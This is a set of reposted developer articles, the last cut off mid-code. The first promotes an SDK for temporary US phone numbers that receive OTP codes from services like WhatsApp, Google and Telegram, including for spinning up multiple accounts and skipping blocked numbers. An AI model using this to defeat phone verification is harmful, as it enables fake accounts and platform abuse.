> Published: 2026-05-24 06:38:41+00:00
> Source: https://dev.to/tellabot_sms/python-sdk-for-tell-a-bot-api-automate-your-sms-verification-2c3f
> wpnews: https://wpnews.pro/news/python-sdk-for-tell-a-bot-api-automate-your-sms-verification

The article announces the release of a Python SDK for the Tell A Bot API, which provides temporary US phone numbers to receive SMS messages and OTP codes for over 700 services. The SDK allows developers to automate phone verification in bots, scrapers, and testing pipelines by requesting numbers, waiting for SMS, and extracting PIN codes via API calls or webhooks. Key features include balance checking, number rejection, error handling, and service listing with pricing and availability.

If you've ever built a bot, scraper, or testing pipeline that needs to verify a phone number, you know the pain: SIM cards, forwarding services, juggling multiple numbers manually. [Tell A Bot](https://www.tellabot.com) solves this — it gives you temporary US phone numbers on demand, receives the SMS, and hands you back the OTP code. All via API.

We just published a **Python SDK** on GitHub, so I wanted to walk through what it looks like in practice.

## What is Tell A Bot?

[Tell A Bot](https://www.tellabot.com) is a service for receiving SMS online using temporary US phone numbers. You request a number for one of 700+ supported services, the number waits for an incoming SMS, and once it arrives you read the message and the extracted PIN code through the API.

Common use cases:

- Automating account registration or verification flows in tests
- Receiving OTP codes in scripts without a physical SIM
- Spinning up multiple accounts for a service during development

## Installation

```
pip install get-sms-online
```

Or directly from GitHub:

```
pip install git+https://github.com/getsms-online/get.sms.online-python.git
```

Generate your API key at **Account → Profile** in Tell A Bot's members area.

## The simplest case — request a number and wait for the code

``` python
from getsms import GetSMSClient, GetSMSError

client = GetSMSClient(user="your_username", api_key="your_api_key")

# Check your balance first
print(f"Balance: ${client.balance()}")

# Request a number for WhatsApp and wait for the SMS
requests = client.request_number("WhatsApp")
req = requests[0]
print(f"Your number: +{req['mdn']}")

sms = client.wait_for_sms(req["id"], timeout=900)
if sms:
    print(f"SMS: {sms['reply']}")
    print(f"Code: {sms['pin']}")
else:
    print("No SMS received in time")
```

`wait_for_sms` polls the API every 15 seconds (the recommended minimum) and returns the message once an SMS arrives, or `None` on timeout.
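For readers curious what a poll-with-timeout loop of this kind involves, here is a generic sketch. It is not the SDK's implementation: `poll_until` and its parameters are hypothetical, and `fetch` stands in for whatever call checks for a message.

```python
import time


def poll_until(fetch, interval_s=15.0, timeout_s=900.0,
               clock=time.monotonic, sleep=time.sleep):
    """Call fetch() every interval_s seconds until it returns a value or time runs out.

    Returns the first non-None result, or None if the next attempt would
    fall after the deadline.
    """
    deadline = clock() + timeout_s
    while True:
        result = fetch()
        if result is not None:
            return result
        if clock() + interval_s > deadline:
            return None
        sleep(interval_s)
```

Passing `clock` and `sleep` as parameters keeps the loop testable without waiting in real time; in normal use the defaults are fine.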

## Error handling

``` python
from getsms import GetSMSClient, GetSMSError

client = GetSMSClient(user="your_username", api_key="your_api_key")

try:
    requests = client.request_number("Google")
    req = requests[0]

    sms = client.wait_for_sms(req["id"])
    if sms:
        print(f"Got code: {sms['pin']}")
    else:
        print("Timed out — no SMS received")

except GetSMSError as e:
    # API-level errors: invalid service name, no numbers available, etc.
    print(f"API error: {e}")
except Exception as e:
    # Network errors
    print(f"Request failed: {e}")
```

## Reject a number you don't want

If the assigned number looks wrong or you want to skip it, reject it — it won't be offered to you again:

``` python
requests = client.request_number("Telegram")
req = requests[0]

if req["mdn"].startswith("1212"):
    client.reject(req["id"])   # NYC numbers blocked by the service? Skip it.
```

## Webhooks instead of polling

If you're handling volume, configure a webhook URL at **Account → Profile**. Tell A Bot will POST to your endpoint the moment an SMS arrives, with fields including `event`, `id`, `reply`, `pin`, and `price`. No polling loop needed.
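
A receiving endpoint might look roughly like the sketch below, which uses only the standard library. The field names come from the list above; everything else is an assumption, in particular the body encoding (JSON or form-encoded), so check the API reference before relying on it. `parse_sms_webhook` and `SMSWebhookHandler` are hypothetical names.

```python
import json
from http.server import BaseHTTPRequestHandler
from urllib.parse import parse_qs

EXPECTED_FIELDS = ("event", "id", "reply", "pin", "price")


def parse_sms_webhook(body: bytes, content_type: str = "") -> dict:
    """Decode a webhook body into a dict with the fields named in the article.

    Assumption: the body is either JSON or form-encoded.
    """
    text = body.decode("utf-8")
    if "json" in content_type.lower():
        data = json.loads(text)
    else:
        # parse_qs returns a list per key; keep the first value of each
        data = {key: values[0] for key, values in parse_qs(text).items()}
    # Missing fields come back as None rather than raising
    return {field: data.get(field) for field in EXPECTED_FIELDS}


class SMSWebhookHandler(BaseHTTPRequestHandler):
    """Minimal handler: read the POST body, parse it, acknowledge with 200."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        payload = parse_sms_webhook(
            self.rfile.read(length), self.headers.get("Content-Type", "")
        )
        print(f"Request {payload['id']}: code {payload['pin']}")
        self.send_response(200)
        self.end_headers()
```

To try it locally, serve the handler with `http.server.HTTPServer(("", 8080), SMSWebhookHandler).serve_forever()`; the port is arbitrary.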

## Check available services and pricing

``` python
# All services
services = client.list_services()
for s in services:
    print(f"{s['name']}: ${s['price']} ({s['otp_available']} available)")

# Single service — also returns recommended_markup for priority bidding
info = client.list_services("Google")
print(info[0]["recommended_markup"])
```

## Links

- [Tell A Bot](https://www.tellabot.com): sign up, manage numbers, configure webhooks
- [API reference](https://www.tellabot.com/api_command_reference.php): full documentation
- [Python SDK on GitHub](https://github.com/getsms-online/get.sms.online-python): source

---
## What I Understood from Cracking the Coding Interview

> Published: 2026-05-24 06:37:03+00:00
> Source: https://dev.to/vishwa_k/what-i-understood-from-cracking-the-coding-interview-okc
> wpnews: https://wpnews.pro/news/what-i-understood-from-cracking-the-coding-interview

The article summarizes key lessons from the book *Cracking the Coding Interview*, emphasizing that technical interviews test problem-solving ability and practical coding skills rather than academic knowledge or memory. It highlights the importance of regular practice with real interview questions, clear communication of one's thought process during interviews, and the need for confidence and analytical thinking. The author concludes that success in software interviews requires more than intelligence or good grades, demanding dedicated preparation and a focus on practical learning.

Recently, my mentor gave me the book Cracking the Coding Interview and asked me to read it carefully. After reading the introduction, I understood many important things about technical interviews, coding skills, and the real expectations of software companies. The book gave me a new perspective on how students should prepare for interviews and careers in the software industry.
The introduction begins with a story about a candidate who was highly talented but still failed a technical interview. He had a strong academic background, a very good GPA, and experience working on open-source projects. He was intelligent, creative, and hardworking. Even with all these qualities, he was rejected because he could not perform well during the interview process. This story made me realize that academic marks and theoretical knowledge alone are not enough to succeed in technical interviews.
One of the main lessons I learned from this book is that coding interviews are designed to test problem-solving ability rather than memory. Interviewers are not interested only in whether a candidate knows programming languages or textbook definitions. They want to see how candidates think, how they approach a problem, and how effectively they can develop a solution. The candidate in the story struggled because he could not quickly identify efficient algorithms and made coding mistakes during the interview. This showed me that interviews require strong analytical thinking and practical coding skills.
Another important point explained in the book is the value of practice. Many students spend a lot of time studying theory from textbooks and learning complex concepts. While these topics are useful, they are not sufficient for interview preparation. The author explains that candidates should practice real interview questions regularly. By solving different coding problems, students can learn common patterns, improve logical thinking, and gain confidence. This helped me understand that daily practice is one of the most important parts of preparation.
The book also highlights the importance of communication during interviews. Candidates should not only write code but also explain their thinking process clearly. Interviewers observe how candidates analyze the problem, discuss multiple approaches, and improve their solutions step by step. Even when mistakes happen, the ability to correct them calmly is important. This taught me that confidence and communication skills are equally valuable in technical interviews.
I was also inspired by the author’s passion for teaching. She explains that many talented students fail interviews not because they are weak, but because they prepare in the wrong way. Her goal is to help students understand the interview process and improve their preparation methods. This motivated me to focus more on practical learning instead of only studying theory.
Overall, Cracking the Coding Interview helped me understand that success in software interviews requires more than intelligence or academic performance. It requires problem-solving ability, coding practice, logical thinking, and confidence. The introduction itself gave me valuable guidance about how to prepare for my future career. After reading it, I feel more motivated to improve my coding skills, practice interview questions regularly, and become a better software engineer in the future.

---
## How Thinking Machines built interactivity into the model

> Published: 2026-05-24 06:35:52+00:00
> Source: https://dev.to/thousand_miles_ai/how-thinking-machines-built-interactivity-into-the-model-3an8
> wpnews: https://wpnews.pro/news/how-thinking-machines-built-interactivity-into-the-model

According to a May 11, 2026 research preview from Thinking Machines, the company has developed a new class of "interaction models" that process audio, video, and text in continuous 200-millisecond ticks, eliminating the need for a separate voice-activity-detection component. This design allows the model to handle input and output streams concurrently, achieving 0.40 seconds end-to-end latency on the FD-bench V1 benchmark—roughly three times faster than GPT-realtime-2.0 and half the latency of Gemini-3.1-flash-live. The system splits responsibilities between a 276-billion-parameter interaction model for real-time conversation and an asynchronous background model for deeper reasoning, enabling the interaction model to maintain continuous dialogue without freezing during complex tasks.

A new release from Thinking Machines, dated May 11, 2026, lands at 0.40 seconds end-to-end on the FD-bench V1 turn-taking benchmark — about three times faster than GPT-realtime-2.0 (xhigh) and roughly half the latency of Gemini-3.1-flash-live (high). The latency number is the surface story. The architectural story is what makes it possible: the model is processing audio, video, and text in 200-millisecond ticks, with no separate turn-detection component sitting between the user and the weights.
The post that landed at thinkingmachines.ai is a research-preview announcement of a class of models the team is calling interaction models. The framing question worth taking seriously is this: what changes when interactivity is part of the model itself instead of a harness around it? The three sections below walk through the answer.
A turn-based model receives one complete input, generates one complete output, and waits. An interaction model receives 200ms of input and produces 200ms of output, then 200ms more, then more — input and output streams running concurrently. The model does not see "the user's turn finished, now respond." It sees a continuous interleaved sequence: input chunk, output chunk, input chunk, output chunk, with no artificial turn boundaries to honor.
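The interleaved stream layout can be pictured with a toy generator. This is only an illustration of the sequence shape (input chunk, output chunk, input chunk, output chunk), not how the model is implemented; `interleave_ticks` and the `respond` callback are hypothetical, and text strings stand in for audio or video chunks.

```python
from typing import Callable, Iterable, Iterator, List, Tuple

TICK_MS = 200  # tick length reported in the post


def interleave_ticks(
    input_chunks: Iterable[str],
    respond: Callable[[List[Tuple[str, str]]], str],
) -> Iterator[Tuple[int, str, str]]:
    """Yield (time_ms, role, chunk): one input chunk, then one output chunk, per tick."""
    history: List[Tuple[str, str]] = []
    for tick, chunk in enumerate(input_chunks):
        t = tick * TICK_MS
        history.append(("in", chunk))
        yield t, "in", chunk
        # The responder sees everything so far, including its own earlier output.
        # An empty string means "stay silent for this tick".
        out = respond(history)
        history.append(("out", out))
        yield t, "out", out
```

Note that there is no "end of turn" signal anywhere in the loop: silence is just another output chunk.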
What disappears in this design is the voice-activity-detection harness that lives between the user and the model in most real-time speech systems today. Turn-based models cannot tell on their own whether the user is thinking, yielding the floor, or being briefly silent — a separate, smaller component makes that call and passes the model a "go" signal. Thinking Machines argues, citing The Bitter Lesson, that any harness less intelligent than the model itself will eventually be outpaced by the model. So they remove the harness, and the things that harnesses could not express — speaking while listening, reacting to a visual cue without an audio prompt — become things the model can do directly.
The audio and video paths are deliberately lightweight. Audio comes in as dMel features through a thin embedding layer, not a Whisper-style encoder. Images are split into 40×40 patches encoded by an hMLP. The audio decoder is a flow head. All four components — embedding, image patcher, flow head, and the main transformer — are co-trained from scratch together. The phrase the team uses is encoder-free early fusion, and the practical effect is that there is no separate pre-processing model whose limits cap what the interaction model can do.
A 200ms tick is fast enough for conversational presence, but it is not enough time for sustained reasoning, tool use, or longer-horizon work. The system splits those responsibilities across two models. The interaction model, `TML-Interaction-Small` (a 276-billion-parameter mixture-of-experts with 12B active), holds the live thread: it listens, speaks, and watches. When the user asks for something that needs deeper work, the interaction model delegates to a background model that runs asynchronously.
The split matters because the interaction model does not freeze while the background model thinks. It keeps the conversation going — answering follow-ups, taking new input, holding the thread — and weaves background results back in when they arrive, at a moment that fits what the user is currently doing rather than as an abrupt context switch. Both models share context, so the background model is not starting cold from a stripped query; it inherits the full conversation.
The net effect for the user: planning, tool use, and agentic workflows at the response latency of a non-thinking model. The interaction model on its own is also competitive on intelligence benchmarks — 89.7 on text IFEval, 82.1 on voice IFEval — so it is not a thin front-end that punts everything to the background.
The standard interactivity benchmarks (FD-bench, Audio MultiChallenge) put `TML-Interaction-Small` ahead of every other non-thinking model on the Pareto frontier of intelligence versus latency. That is a real result. But the more telling numbers are on benchmarks the team built specifically to test what an interaction model can do that a harness-wrapped turn-based model cannot.
On TimeSpeak, which asks the model to initiate speech at user-specified times with the correct content, `TML-Interaction-Small` scores 64.7 versus 4.3 for GPT-realtime-2.0 (minimal). On CueSpeak, which tests speaking at the appropriate moment in response to a verbal cue, it scores 81.7 versus 2.9. On Charades, a temporal-action-localization task adapted to require the model to say "start" and "stop" at the right moments of a video, the temporal IoU is 32.4 versus 0. On ProactiveVideoQA, where the no-response baseline scores 25.0, `TML-Interaction-Small` scores 33.5: a small absolute lift, but a meaningful one, since the baseline is essentially "say nothing and lose no points."
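For readers unfamiliar with the Charades metric, temporal IoU is the standard intersection-over-union applied to time intervals. The sketch below shows the per-segment formula only; how the benchmark aggregates and scales scores is not described here, and `temporal_iou` is an illustrative name.

```python
from typing import Tuple


def temporal_iou(pred: Tuple[float, float], truth: Tuple[float, float]) -> float:
    """Intersection over union of two time intervals given as (start, end) in seconds."""
    pred_start, pred_end = pred
    true_start, true_end = truth
    # Overlap is zero when the intervals do not intersect
    intersection = max(0.0, min(pred_end, true_end) - max(pred_start, true_start))
    union = (pred_end - pred_start) + (true_end - true_start) - intersection
    return intersection / union if union > 0 else 0.0
```

A model that never says "start" and "stop" produces no predicted interval at all, which is one way a score of exactly 0 can arise.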
Scores near zero usually mean the benchmark is testing a capability the architecture cannot express. The point is not that GPT-realtime-2.0 is poor at speech — it is that turn-based plus harness has no representation for "speak while listening" or "react to a visual cue without an audio prompt." Time-aligned micro-turns do, and the benchmark gap follows.
The post is honest about what is not solved. Very long sessions still need careful context management, because continuous audio and video accumulate context quickly. Streaming at low latency is sensitive to network reliability, and the experience degrades hard over a flaky connection. The current `TML-Interaction-Small` is the small one: larger pretrained models exist but are too slow to serve in this regime today, and the team plans to release them later this year. The research preview will open in the coming months with a wider release after.
Source: Interaction Models: A Scalable Approach to Human-AI Collaboration, Thinking Machines Lab, May 11, 2026.

---
## Four production pitfalls that turn RAG demos into broken chatbots

> Published: 2026-05-24 06:35:19+00:00
> Source: https://dev.to/sapotacorp/four-production-pitfalls-that-turn-rag-demos-into-broken-chatbots-127o
> wpnews: https://wpnews.pro/news/four-production-pitfalls-that-turn-rag-demos-into-broken-chatbots

Based on the article, the primary reason RAG (Retrieval-Augmented Generation) chatbots fail in production is that internal demo questions are written by people familiar with the knowledge base, while real users ask long-tail queries the system cannot answer. The article identifies four key pitfalls: vector search returning irrelevant chunks without a "nothing matched" mode, using a single chunk size for diverse content types, failing to monitor embedding drift as the corpus grows, and lacking a router to handle multi-hop queries. Solutions include setting a similarity threshold, implementing a faithfulness check, using content-type-specific chunking, and adding observability tools.

A common pattern we see: a Series A team builds a RAG assistant, runs a 50-question internal demo, ships to production, and within two weeks the support inbox is full of "the AI gave me a wrong answer" tickets. Nothing changed between Tuesday's demo and Friday's outage. The same model, the same retrieval, the same prompt template.
What changed is the question distribution. Internal demos are written by people who already know the corpus. Production users are not. The four failure modes below show up almost every time.
Vector search does not have a "nothing matched" mode. It returns the top-k closest chunks regardless of whether any of them actually answer the question. Cosine similarity of 0.62 looks roughly like cosine similarity of 0.78 to a model that just consumes the chunks as prompt context.
The result is a confident hallucination on every long-tail query. A user asks about a feature the team has not documented yet, and the assistant returns a fluent paragraph stitched together from the closest tangentially related content. The user has no way to know the answer is wrong.
The Sapota fix is two-pronged. First, set a similarity floor (typically cosine 0.7 to 0.75 depending on the embedding model) and return "I do not have this in my knowledge base" when the top result falls below it. Second, add a faithfulness check using either Ragas or a smaller LLM-as-judge that verifies the generated answer is grounded in the retrieved context before it ships to the user. The faithfulness gate alone catches around 40% of the hallucinations we see in audits.
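The first prong, the similarity floor, can be sketched in a few lines. This is a minimal in-memory illustration, not Sapota's implementation: `retrieve_with_floor` is a hypothetical name, the default floor of 0.72 is just a value inside the range quoted above, and a real system would query a vector store instead of scanning a list.

```python
import math
from typing import List, Optional, Sequence, Tuple


def cosine(a: Sequence[float], b: Sequence[float]) -> float:
    """Cosine similarity of two equal-length vectors (0.0 if either is all zeros)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


def retrieve_with_floor(
    query_vec: Sequence[float],
    chunks: Sequence[Tuple[str, Sequence[float]]],
    k: int = 3,
    floor: float = 0.72,
) -> Optional[List[str]]:
    """Return the top-k chunk texts, or None when even the best match is below the floor."""
    scored = sorted(
        ((cosine(query_vec, vec), text) for text, vec in chunks), reverse=True
    )
    top = scored[:k]
    if not top or top[0][0] < floor:
        # Caller should answer "I do not have this in my knowledge base"
        return None
    return [text for _, text in top]
```

Returning `None` instead of an empty list makes the "nothing matched" case explicit, so the calling code cannot accidentally pass an empty context to the generator.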
Most teams pick chunk_size=512 because that is the default in the framework they started with, and never look at it again. This is fine for blog-post-style content. It is not fine for a corpus that mixes blog posts, research papers, code documentation, and contracts.
Two failure modes follow:
The Sapota playbook is to pick chunk size per content type, not per corpus. Markdown documentation gets recursive splitting on headings. Research papers get hierarchical chunking with parent-section metadata. Contracts get section-level chunks with cross-reference resolution. The infrastructure cost of mixing strategies is small. The recall difference is not.
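Choosing a chunker per content type amounts to a small dispatch table. The sketch below is an assumption-laden simplification: it shows a single-level heading split for Markdown (not the recursive variant) and a fixed-size fallback that counts whitespace-separated words as a stand-in for tokens. The hierarchical and contract chunkers are omitted, and all names are hypothetical.

```python
import re
from typing import Callable, Dict, List


def split_on_headings(text: str) -> List[str]:
    """Start a new chunk at every Markdown heading line (# through ######)."""
    parts = re.split(r"(?m)^(?=#{1,6} )", text)
    return [part.strip() for part in parts if part.strip()]


def split_fixed(text: str, size: int = 512) -> List[str]:
    """Fallback: fixed windows of `size` words."""
    words = text.split()
    return [" ".join(words[i:i + size]) for i in range(0, len(words), size)]


# Register one chunker per content type; unknown types use the fallback
CHUNKERS: Dict[str, Callable[[str], List[str]]] = {
    "markdown": split_on_headings,
}


def chunk(text: str, content_type: str) -> List[str]:
    """Dispatch to the chunker registered for this content type."""
    return CHUNKERS.get(content_type, split_fixed)(text)
```

Adding a new content type is then a one-line change to `CHUNKERS`, which is why the infrastructure cost of mixing strategies stays small.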
If the corpus is genuinely homogeneous, run a sweep at 256, 512, and 1024 tokens against a 100-question eval set and pick the winner. Do not eyeball it.
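A sweep of this kind can be as simple as the sketch below. It assumes an eval set of `(question, expected_doc_id)` pairs and a `retrieve(question, chunk_size)` callable that returns ranked document ids from an index built at that chunk size; both are hypothetical interfaces, and hit rate at k is just one reasonable metric.

```python
from typing import Callable, Dict, List, Sequence, Tuple

EvalSet = Sequence[Tuple[str, str]]
Retriever = Callable[[str, int], List[str]]


def hit_rate(eval_set: EvalSet, retrieve: Retriever, chunk_size: int, k: int = 5) -> float:
    """Fraction of questions whose expected document appears in the top-k results."""
    hits = sum(
        1
        for question, expected in eval_set
        if expected in retrieve(question, chunk_size)[:k]
    )
    return hits / len(eval_set)


def sweep_chunk_sizes(
    eval_set: EvalSet,
    retrieve: Retriever,
    sizes: Sequence[int] = (256, 512, 1024),
    k: int = 5,
) -> Tuple[int, Dict[int, float]]:
    """Score every chunk size and return (best_size, scores_by_size)."""
    scores = {size: hit_rate(eval_set, retrieve, size, k) for size in sizes}
    best = max(scores, key=scores.get)
    return best, scores
```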
This is the one that quietly kills RAG products six months in. The team ships, things look fine, the founder moves on to the next feature. Three months later the corpus has grown by 40%, the embedding distribution has drifted, and recall has dropped from 85% to 62%. Nobody notices because nobody is looking.
The minimum observability stack we ship with every RAG project:
The expensive version of this is a full LLMOps platform. The cheap version is a Postgres table, a cron job, and a Slack webhook. Both work. What does not work is having neither.
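The cheap version could look something like this sketch. It uses `sqlite3` from the standard library as a stand-in for the Postgres table so the example is self-contained; the table name, the `max_drop` threshold, and `record_and_check` are all assumptions. A cron job would call it after each eval run and post the returned message to a Slack webhook.

```python
import sqlite3
from typing import Optional


def record_and_check(
    conn: sqlite3.Connection,
    run_date: str,
    recall: float,
    max_drop: float = 0.05,
) -> Optional[str]:
    """Log one recall measurement; return an alert message if it fell too far below baseline.

    run_date must be an ISO date string so that text ordering matches time ordering.
    """
    conn.execute(
        "CREATE TABLE IF NOT EXISTS recall_log (run_date TEXT PRIMARY KEY, recall REAL)"
    )
    # Baseline is the earliest measurement on record
    baseline = conn.execute(
        "SELECT recall FROM recall_log ORDER BY run_date LIMIT 1"
    ).fetchone()
    conn.execute("INSERT INTO recall_log VALUES (?, ?)", (run_date, recall))
    conn.commit()
    if baseline is not None and baseline[0] - recall > max_drop:
        return f"Recall dropped from {baseline[0]:.0%} to {recall:.0%} (run {run_date})"
    return None
```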
User asks: "Which of our enterprise customers complained about the new pricing tier in Q4?" This is a three-hop question: find enterprise customers, filter by Q4 timeframe, find the ones with complaints about pricing. A single vector search over a chunked CRM corpus will not find the answer. It will find chunks that mention "enterprise" and "pricing" and stitch together something plausible.
The fix is one of three patterns, depending on how often these queries show up:
The default we recommend is to add a router as the first step. A small fast model (Llama 3.1 8B is enough) classifies whether the query is single-hop, multi-hop, or structured, and dispatches accordingly. The cost is one extra LLM call per query. The accuracy gain on the 15 to 25% of queries that are actually multi-hop is worth it.
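The router step might be wired up roughly as follows. The `classify` callable stands in for the small-model call and the handlers for the downstream pipelines; these names, the three label strings, and the fallback policy are assumptions for illustration.

```python
from typing import Callable, Dict

Handler = Callable[[str], str]


def route(
    query: str,
    classify: Callable[[str], str],
    handlers: Dict[str, Handler],
    default: str = "single_hop",
) -> str:
    """Classify the query, then dispatch it to the matching pipeline.

    `handlers` must contain an entry for `default`.
    """
    label = classify(query).strip().lower()
    if label not in handlers:
        # Small models sometimes return unexpected text; fall back to plain retrieval
        label = default
    return handlers[label](query)
```

Normalising the label and falling back to the single-hop path keeps a misbehaving classifier from turning into a hard failure.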
When a team brings us in after a launch goes wrong, the first 48 hours are diagnostic, not engineering. We ask for:
The query log usually shows that 60% of production queries fall outside the distribution the eval set covered. The eval set was written by the engineers, who think like engineers. Production users ask questions in a different shape.
The diagnostic deliverable is a one-page document mapping each user complaint to which of the four pitfalls caused it, with a recommended fix and the order to ship them in. Most teams can ship the highest-impact two fixes in the first week and recover 70% of the lost user trust.
If the AI assistant your team shipped is getting worse instead of better, or if the eval scores look fine but the user feedback says otherwise, that is the gap an audit closes. Sapota runs a fixed-scope two-week diagnostic engagement that produces the document above plus the implementation plan for the first three fixes.
Reach out via the AI engineering page with a description of what you are seeing in production. The first conversation is free and almost always surfaces at least one of the four pitfalls within thirty minutes.

---
## Active Page: Tackling Local AI for Transforming Passive Reading into Active Recall

> Published: 2026-05-24 06:35:06+00:00
> Source: https://dev.to/muhammad_dafi_5eebbcb5d63/active-page-tackling-local-ai-for-transforming-passive-reading-into-active-recall-4hoj
> wpnews: https://wpnews.pro/news/active-page-tackling-local-ai-for-transforming-passive-reading-into-active

Active Page is a local-first application that uses the Gemma 4 E2B model to combat the "forgetting curve" by automatically generating contextual quizzes from reading material. It runs entirely on the user's machine for zero operational costs and privacy, featuring a streak system to encourage daily learning habits. The app optimizes performance through techniques like prefix caching and an asynchronous pre-fetching pipeline to minimize latency and maintain reading immersion.

This is a submission for the Gemma 4 Challenge: Build with Gemma 4
Most readers suffer from the "forgetting curve." By the time we finish the later chapters of a dense book, the foundational concepts from the introduction have already begun to blur.
As a middle school student trying to learn new things from books and scientific journal articles, I wanted a better way to retain knowledge. My inspiration came from observing National Science Olympiad winners, including a friend of mine and other figures, who maintain peak retention not through passive rereading but through answering a lot of questions every day.
Active Page is a local-first application that transforms passive reading into an interactive learning experience. It automatically generates high-quality, analytical, and contextual quizzes directly from your reading material for immediate memory reinforcement. To help users build a sustainable learning habit, Active Page also features a built-in streak mechanics system to keep readers motivated daily. 🔥🔥
Because Active Page runs locally, its operational cost is zero (aside from running the device), with the side benefit that you can read books without an internet connection. While local compute constraints often drive developers toward over-engineering, Active Page takes a more elegant path.
Active Page is a privacy-first, local-LLM-powered reading companion designed to solve the "forgetting curve." By leveraging the cutting-edge Gemma 4 E2B model, it transforms passive reading into an interactive learning session through real-time, contextual active recall—running entirely on your machine.
The `init.sh` script automates the heavy lifting: it manages dependencies via uv, compiles llama.cpp for your specific hardware, and pulls the optimized Gemma 4 E2B weights.
bash init.sh
Note for Silicon/AMD: If using Apple M-Series or AMD GPUs, edit init.sh to enable GGML_METAL=ON or GGML_HIPBLAS=ON respectively for hardware acceleration.
Launch the inference engine and the interactive web interface simultaneously:
bash run.sh
Access the application at: http://localhost:8000
System crashing / out of memory in `init.sh`: if your RAM or CPU is limited, adjust the build parallelism…
I selected the Gemma-4-E2B model because it balances performance and efficiency for local deployment. It uses Per-Layer Embeddings (PLE) and a hybrid attention mechanism that combines Sliding Window Attention (SWA) with Grouped Query Attention (GQA). This architecture gives it a 128K context window and output quality that rivals much larger models, while remaining lightweight and fast enough for edge devices.
Beyond simply powering the app, Gemma-4-E2B's design unlocked sophisticated long-context capabilities on-device. Its compact size leaves room for aggressive KV cache use and manipulation, which is essential for maintaining a seamless, responsive reading experience with active recall across extended contexts.
The "memory" of an AI (KV Cache) is usually treated as a linear path. In most apps, the book data is treated as a fresh prompt every time, which is slow and memory-intensive.
I inverted this structure to maximize Prefix Caching:
To tackle memory constraints and decode speed, we use this technique, which also comes from Google.
Even with an optimized KV cache, generating a multiple-choice question (MCQ) quiz takes a short processing window. Forcing a reader to wait at a loading spinner when a quiz triggers would break their reading immersion.
Active Page hides local execution latency by decoupling the generation engine from the UI through an Asynchronous Pre-Fetching Pipeline:
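A pre-fetching pipeline of this kind could be sketched with `asyncio` as below. This is not the project's code: `QuizPrefetcher` and `generate_quiz` are hypothetical names, and the short sleep stands in for the local model call.

```python
import asyncio
from typing import Awaitable, Callable, Dict


async def generate_quiz(page_text: str) -> str:
    """Stand-in for the local model call (hypothetical)."""
    await asyncio.sleep(0.01)
    return f"Quiz on: {page_text[:20]}"


class QuizPrefetcher:
    """Start quiz generation when a page is opened; collect it when the quiz is due."""

    def __init__(self, generate: Callable[[str], Awaitable[str]] = generate_quiz):
        self._generate = generate
        self._tasks: Dict[int, "asyncio.Task[str]"] = {}

    def prefetch(self, page_no: int, page_text: str) -> None:
        """Kick off generation in the background. Must be called from a running event loop."""
        if page_no not in self._tasks:
            self._tasks[page_no] = asyncio.create_task(self._generate(page_text))

    async def get(self, page_no: int) -> str:
        """Return the quiz; if generation already finished, this returns immediately."""
        return await self._tasks.pop(page_no)
```

The reader only ever waits in `get`, and only if they reach the quiz point before generation finishes.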

---
## TerraSight Offline Satellite Analysis Powered by Gemma 4

> Published: 2026-05-24 06:30:54+00:00
> Source: https://dev.to/hyster_alan_cae6913e040c6/terrasight-offline-satellite-analysis-powered-by-gemma-4-2nkk
> wpnews: https://wpnews.pro/news/terrasight-offline-satellite-analysis-powered-by-gemma-4

**Summary:** TerraSight is an offline geospatial analysis tool that processes raw Landsat 9 satellite data on a user's local machine to compute vegetation health (NDVI), urban coverage (NDBI), and land surface temperature (LST). It uses Google's Gemma 4 E4B model, running locally via Ollama, to provide contextual AI explanations of the computed statistics without requiring cloud processing or GIS expertise. The tool is designed for non-specialists like farmers and students, ensuring data privacy by keeping all analysis and AI inference on the user's hardware.

*This is a submission for the Gemma 4 Challenge: Build with Gemma 4*

## What I Built

TerraSight is a geospatial analysis tool that runs entirely on your machine. You upload raw Landsat 9 satellite band files, draw a study boundary, and the app computes three indices: NDVI (vegetation health), NDBI (urban surface coverage), and LST (land surface temperature), then renders calibrated colour maps and lets you interrogate the results through an AI chat interface.

No cloud processing. No API keys. No data leaving your machine.

The problem I was solving is straightforward: satellite imagery analysis has always sat behind expensive software licenses (ENVI, ArcGIS) or required GIS expertise most people don't have. Farmers checking crop stress, students doing fieldwork, community researchers tracking urban heat: they don't need a commercial GIS suite. They need something that takes a file, does the math correctly, and explains what the numbers mean in plain language.

That last part is where Gemma 4 comes in.

## Demo

## Code

**GitHub:** [github.com/HysterAlan1/terrasight-geoai](https://github.com/HysterAlan1/terrasight-geoai)

The project is split into two files by design:

- `gis_engine.py`: all geospatial computation, radiometric scaling, and AI logic. No Streamlit. You can import it directly into a notebook or script.
- `app.py`: the Streamlit UI. It calls the engine, handles session state, and renders everything. Nothing that touches pixels lives here.

The processing pipeline applies official USGS Collection 2 Level-2 scale factors to convert raw digital numbers into physical values:

```
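import numpy as np

# DN: array of raw digital numbers read from a band file
# Optical bands → surface reflectance
reflectance = np.clip((DN * 0.0000275) - 0.2, 0.0, 1.0)

# Thermal band → Celsius (scale to Kelvin, then subtract 273.15)
lst = (DN * 0.00341802) + 149.0 - 273.15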
```

Pixels where any optical band reads zero get masked to `NaN` before any index is computed. This matters: skipping that step would quietly corrupt NDVI and NDBI values for no-data areas without raising any error.
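
To make the masking step concrete, here is a minimal sketch of the index computation using the standard normalized-difference formulas, NDVI = (NIR − Red) / (NIR + Red) and NDBI = (SWIR − NIR) / (SWIR + NIR). It is not taken from `gis_engine.py`; the function names are hypothetical, and the inputs are assumed to be the red, near-infrared, and shortwave-infrared bands as raw digital-number arrays.

```python
import numpy as np


def to_reflectance(dn: np.ndarray) -> np.ndarray:
    """Apply the optical scale factors from the article; zero DN (no data) becomes NaN."""
    dn = dn.astype("float64")
    reflectance = np.clip(dn * 0.0000275 - 0.2, 0.0, 1.0)
    return np.where(dn == 0, np.nan, reflectance)


def normalized_difference(a: np.ndarray, b: np.ndarray) -> np.ndarray:
    """(a - b) / (a + b), with NaN wherever the result is not finite."""
    with np.errstate(divide="ignore", invalid="ignore"):
        out = (a - b) / (a + b)
    return np.where(np.isfinite(out), out, np.nan)


def compute_indices(red_dn: np.ndarray, nir_dn: np.ndarray, swir_dn: np.ndarray):
    """Return (ndvi, ndbi), masked wherever any input band has no data."""
    red, nir, swir = (to_reflectance(band) for band in (red_dn, nir_dn, swir_dn))
    nodata = np.isnan(red) | np.isnan(nir) | np.isnan(swir)
    ndvi = np.where(nodata, np.nan, normalized_difference(nir, red))
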